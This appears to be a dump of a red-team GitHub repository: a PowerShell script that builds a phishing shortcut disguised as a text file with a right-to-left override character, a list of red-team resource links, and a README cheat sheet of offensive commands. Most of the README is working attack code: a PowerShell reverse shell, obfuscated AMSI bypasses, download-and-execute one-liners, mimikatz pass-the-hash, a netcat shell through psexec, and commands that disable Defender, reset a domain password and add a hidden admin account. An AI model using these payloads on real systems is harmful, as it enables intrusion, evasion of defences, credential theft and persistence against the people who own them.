├── tax.exe
├── attcking-ad-for-fun-and-profit.pdf
├── Generate-LNK.ps1
├── Red-team.md
└── README.md
/tax.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hexachordanu/Red-Team-Essentials/HEAD/tax.exe
--------------------------------------------------------------------------------
/attcking-ad-for-fun-and-profit.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hexachordanu/Red-Team-Essentials/HEAD/attcking-ad-for-fun-and-profit.pdf
--------------------------------------------------------------------------------
/Generate-LNK.ps1:
--------------------------------------------------------------------------------
function Generate-LNK{
<#

.SYNOPSIS
Builds a Windows shortcut (.lnk) that launches $exec with $argg, disguises its file name, and zips it.

.DESCRIPTION
Uses the WScript.Shell COM object to create a shortcut whose target is $exec and whose
arguments are $argg (by default a PowerShell "IEX (New-Object Net.WebClient).DownloadString(...)"
of $reverseadd), gives it the first icon of $iconpath and the description $desc, then renames
the file to "ReadMe.<U+202E>txt.lnk". U+202E is RIGHT-TO-LEFT OVERRIDE, so Explorer displays
the name as "ReadMe.knl.txt" while the extension stays .lnk. The renamed file is finally packed
into $zippath with Compress-Archive.

Authorised engagements only - the output is a phishing payload. Defensive indicators visible
in this script: U+202E in a file name, "-ExecutionPolicy Bypass" together with "DownloadString"
in a shortcut's arguments, and shortcut creation through the WScript.Shell COM object.

.PARAMETER iconpath
Executable whose icon (index 0) the shortcut displays. Defaults to notepad.exe.

.PARAMETER exec
Target of the shortcut, e.g. cmd.exe or powershell.exe. Defaults to "powershell".

.PARAMETER desc
Description (tooltip) stored in the shortcut; defaults to text that mimics a text document.

.PARAMETER reverseadd
URL of a hosted PowerShell script (e.g. a reverse-shell one-liner) that the default $argg downloads and runs.

.PARAMETER argg
Arguments passed to $exec. The default embeds $reverseadd in a download-and-execute one-liner.

.PARAMETER lnkpath
Path the shortcut is first saved to. NOTE(review): the file is afterwards renamed into
$env:USERPROFILE\Desktop regardless of this value (see the ren call below), so keep it on the Desktop.

.PARAMETER zippath
Path, including file name, of the zip archive to create.

.EXAMPLE
PS C:\> . .\Generate-LNK.ps1
PS C:\> Generate-LNK -reverseadd "http://youripofwebserver/powershellreverseoneliner.txt"

.LINK
https://raw.githubusercontent.com/xillwillx/tricky.lnk/master/tricky.ps1

.NOTES
This script is a modified version of xillwillx's script and I take no credit of the code. Full credit goes to xillwillx.
Follow him on twitter - @xillwillx

#>

[CmdletBinding()]
Param (

    # Executable whose icon (index 0, see IconLocation below) the shortcut shows.
    [Parameter(Mandatory=$false)]
    [String]
    $iconpath = "C:\Windows\System32\notepad.exe",

    # What the shortcut actually launches.
    [Parameter(Mandatory=$false)]
    [String]
    $exec = "powershell",

    # Tooltip text; mimics a plain text document.
    [Parameter(Mandatory=$false)]
    [String]
    $desc = "Type: Text Document",

    # URL that the default $argg downloads and runs.
    [Parameter(Mandatory=$false)]
    [String]
    $reverseadd = "http://192.168.100.13:443/reverse.txt",

    # Double-quoted: $reverseadd is interpolated into the argument string when this
    # default is evaluated. Defaults are evaluated after binding, in declaration order,
    # so a -reverseadd supplied by the caller is the value embedded here.
    [Parameter(Mandatory=$false)]
    [String]
    $argg = " -ExecutionPolicy Bypass -noLogo -Command IEX (New-Object Net.WebClient).DownloadString($reverseadd);",

    # Initial save location; the file is renamed onto the Desktop further down.
    [Parameter(Mandatory=$false)]
    [String]
    $lnkpath = $env:USERPROFILE + "\Desktop\FakeText.lnk",

    # Destination archive for Compress-Archive.
    [Parameter(Mandatory=$false)]
    [String]
    $zippath = $env:USERPROFILE + "\Desktop\hululu.zip"
)
try{
    # Shortcut creation via the WScript.Shell COM object.
    $ws = New-Object -ComObject ("WScript.Shell")
    $sh = $ws.CreateShortcut($lnkpath)
    $sh.Arguments = $argg
    $sh.TargetPath = $exec
    # ",0" selects icon index 0 of $iconpath.
    $sh.IconLocation = $iconpath + ",0";
    $sh.Description = $desc;
    $sh.Save()
    # %u-encoded "ReadMe." + U+202E (RIGHT-TO-LEFT OVERRIDE) + "txt.lnk".
    # Displayed as "ReadMe.knl.txt"; the real extension remains .lnk.
    $unicode = "%u0052%u0065%u0061%u0064%u004d%u0065%u002e%u202e%u0074%u0078%u0074%u002e%u006c%u006e%u006b"
    # Loads System.Web for HttpUtility. LoadWithPartialName is deprecated and its return
    # value is not captured, so the Assembly object is emitted to the pipeline as output noise.
    [Reflection.Assembly]::LoadWithPartialName("System.Web")
    $unescape = [web.httputility]::urldecode($unicode)
    # NOTE(review): the new name is always built under the Desktop, ignoring the directory of
    # $lnkpath. ren is Rename-Item, which cannot move a file between directories, so a -lnkpath
    # outside the Desktop presumably fails here and lands in the catch - confirm.
    ren ($lnkpath) ($env:USERPROFILE + "\Desktop\" + $unescape)
    # NOTE(review): $lnkpath no longer exists after the rename above; the generated file is
    # the Desktop path built from $unescape.
    Write-Host "LNK file is generated - "$lnkpath
    $compress = @{
    Path = $env:USERPROFILE + "\Desktop\" + $unescape
    CompressionLevel = "Fastest"
    DestinationPath = $zippath}
    Compress-Archive @compress
    Write-Host "ZIP file is generated - "$zippath
}
catch
{
    # The underlying exception ($_) is not included, so the cause is lost; add it when debugging.
    Write-Error -Message "Failed to generate lnk file"
}
}
--------------------------------------------------------------------------------
/Red-team.md:
--------------------------------------------------------------------------------
Starting with Red
Teaming 2 | 3 | Red Team Planning and thought process - 4 | 1. https://github.com/magoo/redteam-plan 5 | 6 | Setting up your AD lab - 7 | 1. https://1337red.wordpress.com/building-and-attacking-an-active-directory-lab-with-powershell/ 8 | 2. https://www.youtube.com/watch?v=xftEuVQ7kY0 9 | 3. https://sethsec.blogspot.com/2017/05/pentest-home-lab-0x1-building-your-ad.html 10 | 4. https://www.fatrodzianko.com/2019/08/05/creating-an-active-directory-lab-in-aws/ 11 | 12 | AD and kerberos Introduction - 13 | 1. https://adsecurity.org/?p=227 - Kerberos 14 | 2. https://medium.com/@robert.broeckelmann/kerberos-and-windows-security-kerberos-on-windows-3bc021bc9630 15 | 3. https://www.slideshare.net/rootedcon/carlos-garca-pentesting-active-directory 16 | 4. https://www.slideshare.net/dafthack/red-team-apocalypse 17 | 18 | Blogs - 19 | 1. https://adsecurity.org/ 20 | 2. https://ired.team/ 21 | 3. https://blog.xpnsec.com/ 22 | 4. https://identityaccessdotmanagement.files.wordpress.com/2019/12/ad-security-fundamentals-1.pdf 23 | 5. https://posts.specterops.io/ 24 | 6. https://www.mdsec.co.uk/blog/ 25 | 7. https://rastamouse.me/ 26 | 8. https://vincentyiu.com/red-team-tips - Red Team tips 27 | 9. http://www.labofapenetrationtester.com/ 28 | 10. https://blog.netspi.com/ 29 | 11. https://hausec.com/ 30 | 12. https://www.blackhillsinfosec.com 31 | 13. https://attack.mitre.org/ 32 | 33 | C2 Frameworks - 34 | 1. https://github.com/cobbr/Covenant 35 | 2. https://github.com/nettitude/PoshC2 36 | 3. https://github.com/byt3bl33d3r/SILENTTRINITY 37 | 4. https://www.cobaltstrike.com/ 38 | 39 | 40 | C2 infra Setup - 41 | 1. https://ired.team/offensive-security/red-team-infrastructure/automating-red-team-infrastructure-with-terraform 42 | 2. https://rastamouse.me/2017/08/automated-red-team-infrastructure-deployment-with-terraform---part-1/ 43 | 3. https://silentbreaksecurity.com/modern-red-team-infrastructure/ 44 | 4. https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki 45 | 5. 
https://www.blackhillsinfosec.com/build-c2-infrastructure-digital-ocean-part-1/

CheatSheets -
1. https://github.com/HarmJ0y/CheatSheets
2. https://morph3sec.com/2019/07/16/Windows-Red-Team-Cheat-Sheet/

Trainings and Certs -
1. https://www.pentesteracademy.com/activedirectorylab - Basic ( Still recommended to all )
2. https://www.pentesteracademy.com/redteamlab
3. https://www.pentesteracademy.com/gcb
4. https://www.zeropointsecurity.co.uk/red-team-ops
5. https://specterops.io/how-we-help/training-offerings/adversary-tactics-red-team-operations
6. https://www.hackthebox.eu/ - Pro Labs - ( Rastalabs and Offshore )

Workshop/Random Contents -
1. https://github.com/specterops/at-ps
2. https://github.com/wavestone-cdt/AD-security-workshop
3. https://www.owasp.org/images/a/a4/OWASP_FFM_41_OffensiveActiveDirectory_101_MichaelRitter.pdf
4. https://medium.com/airwalk/practical-phishing-with-gophish-7dd384ad1840 - GoPhish Setup
5. https://vdalabs.com/2019/10/01/phishing-users-using-evilginx-and-bypassing-2fa/ - Phishing with Evilginx
6. https://breakdev.org/evilginx-2-next-generation-of-phishing-2fa-tokens/
7. https://www.scip.ch/en/?labs.20190207 - Bypassing NAC
8. https://hackinparis.com/data/slides/2017/2017_Legrand_Valerian_802.1x_Network_Access_Control_and_Bypass_Techniques.pdf
9. https://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Arkin.pdf - NAC Bypass
10. https://resources.infosecinstitute.com/nac-hacking-bypassing-network-access-control/#gref
11. https://purplesec.us/physical-penetration-testing/ - Physical Pentest Intro

Red Team Tools -
1. https://0xsp.com/offensive/red-teaming-toolkit-collection

Ocean of resources -
1. https://github.com/yeyintminthuhtut/Awesome-Red-Teaming
2. https://github.com/infosecn1nja/AD-Attack-Defense
3.
https://github.com/rmusser01/Infosec_Reference/blob/master/Draft/Physical_Security.md
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# Red-Team-Essentials

Authorised engagements only. Several commands below change the target's security posture (Defender, RDP NLA, local admin accounts, user passwords); record each change and revert it when the engagement ends.

## Disable Defender real-time monitoring

Requires local administrator rights and is blocked when Tamper Protection is enabled. Re-enable with `-DisableRealtimeMonitoring $false` when done.

```Powershell
Set-MpPreference -DisableRealtimeMonitoring $true
```

## Services and startname

```Powershell
Get-WmiObject win32_service | format-Table name, startname, startmode
```

## Force-change password - GenericAll

PowerView cmdlets (see the powerview.ps1 download below). `Add-DomainObjectAcl` is given no `-Rights`, so it falls back to PowerView's default (All); pass `-Rights ResetPassword` when that is all you need. Resetting the password locks the real user out and is highly visible, so prefer a less destructive use of GenericAll where possible and document the change for the client.

```Powershell
Set-DomainObjectOwner -Identity stgadm -OwnerIdentity hexninja
Add-DomainObjectAcl -TargetIdentity stgadm -PrincipalIdentity hexninja
$newpass = ConvertTo-SecureString -String 'Password123!' -AsPlainText -Force
Set-DomainUserPassword -Identity stgadm -AccountPassword $newpass
```

## Powershell Reverse Shell one Liner (AMSI Bypass)

Plain TCP, no TLS: the session and everything typed into it crosses the network in cleartext. The `Set-Alias` of `lol` to `iex` built from char codes only keeps the literal string `iex` out of the command line; it is not an AMSI bypass by itself, so run one of the bypasses below first when AMSI is active.

```Powershell
$ip='192.168.1.114';$port=1337;$client = New-Object System.Net.Sockets.TCPClient -ArgumentList $ip, $port;$s = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};$l = 'lol';Set-alias $l ([char]105 + [char]101 + [char]120);while(($i = $s.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (lol $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$s.Write($sendbyte,0,$sendbyte.Length);$s.Flush()};$client.Close()
```

## AMSI Bypass (Modified Version) - Credit to Matt Graeber's Reflection method
```Powershell
$l = "MSAislolmlola";$s=($l[$true-13] + 'ystem.' + $l[$true-14] + 'anagement.' + $l[$true-12] + 'utomation.'
+ $l[$true-12] + [char]109 + [char]115 + [char]105 + 'Utils');$k=($l[$true-2] + [char]109 + [char]115 + [char]105 + 'InitFailed');[Ref].Assembly.GetType($s).GetField($k,'NonPublic,Static').SetValue($null,$true)
```

## Powershell Download in V4 and V5

```Powershell
Invoke-WebRequest "http://10.10.15.58/hex.ps1" -OutFile "C:\Windows\TEMP\hex.ps1"
```

## Pass-the-hash (sekurlsa::pth) using mimikatz

This is pass-the-hash, not pass-the-ticket. It works against LSASS and therefore needs an elevated (local admin / SYSTEM) context; the spawned powershell.exe uses the injected NTLM hash for network authentication.

```Powershell
Invoke-Mimikatz -Command '"sekurlsa::pth /user:admin /domain:xyz.local /ntlm:ce03434e2f83b99704a631ae56e2146e /run:powershell.exe"'
```

## psexec

`-h` requests an elevated token. `-p` places the password on the command line, where process-creation logging captures it, and the `nc.exe -e` shell is cleartext.

```Powershell
./ps.exe \\\localip -h -accepteula -u username -p password cmd /c 'C:\nc.exe 192.168.50.138 4444 -e cmd.exe'
```

## Check Powershell Version

```Powershell
$PSVersionTable.PSVersion
```

## Download File Powershell V2

```Powershell
(New-Object Net.WebClient).DownloadFile('http://10.10.15.58/powerview.ps1', 'C:\users\someuser\Desktop\powerview.ps1')
```

## Download Execute Powershell One Liner

```Powershell
powershell -exec bypass IEX (New-Object Net.WebClient).DownloadString('http://10.10.15.58/payload.ps1')
```

## AMSI Bypass - Credit to Nikhil Mittal (PTAcademy)

```Powershell
sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
```

## Execute this on the target machine if you get rdesktop's CredSSP error while using remote desktop

Setting `UserAuthentication` to 0 disables Network Level Authentication for RDP on the target, weakening it for everyone, not just you. Set it back to 1 (`/d 1`) when done, or avoid touching the target by using a client that supports NLA/CredSSP such as xfreerdp below.

```Cmd
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
```

## Remote desktop login through domain user credentials

Omit `/p:` to be prompted for the password instead of leaving it in shell history.

```sh
xfreerdp /u:username /d:adcorp.local /p:"passwordxyz" /v:TARGETIP
```

## Download Execute powershell

For hosts behind an authenticating proxy: the current user's credentials are handed to the default proxy before the download.

```Cmd
powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.10.15.58/payload.ps1')|iex"
```

## Pivoting using sshuttle when you have rsa keys

`rsa` is the private key file; ssh refuses a key whose permissions are group- or world-readable (`chmod 600 rsa`). This example logs in as root on the pivot host - use a lower-privileged account where one is available.

```sh
sshuttle -r root@TARGETIP -e "ssh -i rsa" TARGETIPRANGE.0/24
```

## Adding user on windows cmd line & adding it to local admin group

Persistence that is easy to spot (security events 4720 and 4732); the password is also visible in command-line logging. Remove the account when done (`net user hexninja /DELETE`).

```Cmd
net user hexninja lolbr654$@123 /ADD
net localgroup administrators hexninja /ADD
```

## CertUtil Download remote file

certutil keeps a copy of the download in the user's URL cache; `certutil -urlcache http://yourip/malicious.exe delete` removes it.

```cmd
certutil.exe -urlcache -f http://yourip/malicious.exe malicious.exe
```

## CertUtil decode base64

```cmd
certutil -decode malexecbase.b64 malexecutable.exe
```

## regsvr32 to execute malicious dll

`/u` calls the DLL's `DllUnregisterServer` export rather than `DllRegisterServer`, so the DLL must implement it; `/s` suppresses the result dialog.

```cmd
regsvr32 /s /u .\exploit.dll
```

## Net1 (you read it right; it's not net) - available functions similar to net

```cmd
Net1 localgroup administrators
Net1 users
```

## The Invoke-AllChecks module runs all current checks for Windows privesc vectors (part of PowerUp) - Not OPsec Safe
```Powershell
Invoke-AllChecks
```

## Calling Invoke-ServiceAbuse (part of PowerUp) to add hexninja (replace this with your username) as admin user

Replace `VulService` with the misconfigured service reported by Invoke-AllChecks. PowerUp's default action adds the user as a local administrator by abusing the service's configuration, so expect a visible service restart and remove the account afterwards.

```Powershell
Invoke-ServiceAbuse -Name 'VulService' -UserName hexninja
```

## Where utility to search for config files and everything

```cmd
Examples:
WHERE /?
WHERE myfilename1 myfile????.*
WHERE $windir:*.*
WHERE /R c:\windows *.exe *.dll *.bat
WHERE /Q ??.???
WHERE "c:\windows;c:\windows\system32:*.dll"
WHERE /F /T *.dll
```

--------------------------------------------------------------------------------